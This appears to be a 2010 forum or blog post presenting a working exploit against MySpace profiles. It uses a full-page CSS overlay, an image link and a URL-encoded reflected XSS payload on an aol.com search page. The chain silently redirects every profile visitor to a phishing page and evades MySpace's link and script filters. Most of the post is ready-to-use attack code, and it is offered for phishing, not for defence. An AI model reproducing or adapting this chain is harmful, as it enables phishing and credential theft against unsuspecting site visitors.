This is an exploit I found a while ago in myspace.com (still works as of 4/28/2010) that allows you to redirect anyone who visits your profile to any page you want w/o the myspace phishing filter popping up.

Requirements:
- Myspace Account with Profile 2.0 enabled
- An XSS in a trusted site (aol.com is full of them)
- A phishing page


Step 1: Placing the evil CSS
Click on Profile->Customize Profile. Once there click the CSS editor tab and put in this code:

.hax
{
    width: 100000px;
    height: 10000px;
    position: absolute;
    top: 0px; left: 0px;
}

Step 2: Place the evil image
To bypass some filters myspace has we need to use an image instead of an <a href> tag with the exploit. Simply place this code into your profile:
<a href="[ trusted link with xss here ]">
<img src="http://doesntexist.com/nothing.jpg" class="hax" />
</a>

For the trusted link we can use this public xss:
http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&query=query1

and just edit the code like so:
http://cnn.search.aol.com/aol/weboffers?invocationType="><script>window.location='http://google.com'</script>&query=query1
(Just be sure to URL encode the code so myspaces filters don't catch the script tags)

Our final exploit code for our About Me section is:
<a href="http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ewindow.location%3D%27http%3A%2f%2fgoogle.com%27%3C%2fscript%3E&query=query">
<img src="http://doesntexist.com/nothing.jpg" class="hax" />
</a>

Now if anyone clicks on your profile they will be redirected to the trusted page (bypassing any xss filters provided by myspace) which in turn redirects them to the phishing page (or in this case google.com).

Do not re-publish this without my permission first please.
Written by Raze 4/28/2010